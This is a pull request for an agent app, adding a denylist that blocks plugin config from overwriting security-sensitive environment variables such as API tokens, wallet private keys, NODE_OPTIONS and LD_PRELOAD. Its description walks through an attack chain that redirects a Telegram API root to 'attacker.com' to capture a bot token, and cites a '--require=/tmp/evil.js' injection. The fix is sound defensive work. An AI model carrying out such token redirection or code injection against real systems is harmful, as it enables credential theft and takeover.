### PR TITLE
fix(security): add denylist for security-sensitive env vars in plugin config

### DIFF
--- a/packages/app-core/src/api/plugins-compat-routes.ts
+++ b/packages/app-core/src/api/plugins-compat-routes.ts
@@ -496,6 +496,25 @@ export function buildPluginListResponse(runtime: AgentRuntime | null): {
   return { plugins: pluginList };
 }
 
+/**
+ * Env var keys that must never be written via plugin config, even if a
+ * plugin declares them as parameters. Overwriting these would let an
+ * attacker escalate privileges, redirect loopback calls, or leak secrets.
+ */
+const PLUGIN_CONFIG_DENYLIST = new Set([
+  "MILADY_API_TOKEN",
+  "ELIZA_API_TOKEN",
+  "EVM_PRIVATE_KEY",
+  "SOLANA_PRIVATE_KEY",
+  "NODE_OPTIONS",
+  "NODE_PATH",
+  "LD_PRELOAD",
+  "DYLD_INSERT_LIBRARIES",
+  "MILADY_API_PORT",
+  "ELIZA_PORT",
+  "ELIZAOS_CLOUD_API_KEY",
+]);
+
 function validateCompatPluginConfig(
   plugin: CompatPluginRecord,
   config: Record<string, unknown>,
@@ -510,6 +529,14 @@ function validateCompatPluginConfig(
   const values: Record<string, string> = {};
 
   for (const [key, rawValue] of Object.entries(config)) {
+    if (PLUGIN_CONFIG_DENYLIST.has(key)) {
+      errors.push({
+        field: key,
+        message: `${key} cannot be set via plugin config (security-sensitive).`,
+      });
+      continue;
+    }
+
     const parameter = paramMap.get(key);
     if (!parameter) {
       errors.push({


### PR DESCRIPTION
## What

Adds a denylist that prevents plugin config from overwriting security-sensitive environment variables.

## Why

`PUT /api/plugins/:id` accepts a config object with key-value pairs that are written directly to `process.env` (line 617) and persisted to `~/.milady/milady.json`. The only validation is that keys must be declared in the plugin's parameter manifest.

A malicious or compromised plugin manifest could declare parameters matching critical env vars. Once written, these persist across restarts and enable:

- **Credential theft:** `EVM_PRIVATE_KEY`, `SOLANA_PRIVATE_KEY` overwrite to redirect wallet operations
- **Auth bypass:** `MILADY_API_TOKEN` overwrite to a known value
- **SSRF:** `MILADY_API_PORT` overwrite to redirect loopback calls (see #1641)
- **Code injection:** `NODE_OPTIONS=--require=/tmp/evil.js` or `LD_PRELOAD`

### Attack chain (concrete example)

1. Attacker sends `PUT /api/plugins/telegram` with `config: { "TELEGRAM_API_ROOT": "https://attacker.com" }`
2. Next Telegram bot test (`POST /api/plugins/telegram/test`) fetches `https://attacker.com/bot<TOKEN>/getMe`
3. Attacker captures the Telegram bot token

## Fix

A `PLUGIN_CONFIG_DENYLIST` set of 11 keys is checked before any write. Denied keys return a 422 error:

```
MILADY_API_TOKEN, ELIZA_API_TOKEN, ELIZAOS_CLOUD_API_KEY,
EVM_PRIVATE_KEY, SOLANA_PRIVATE_KEY,
NODE_OPTIONS, NODE_PATH, LD_PRELOAD, DYLD_INSERT_LIBRARIES,
MILADY_API_PORT, ELIZA_PORT
```

## Testing

- `bun run build` succeeds
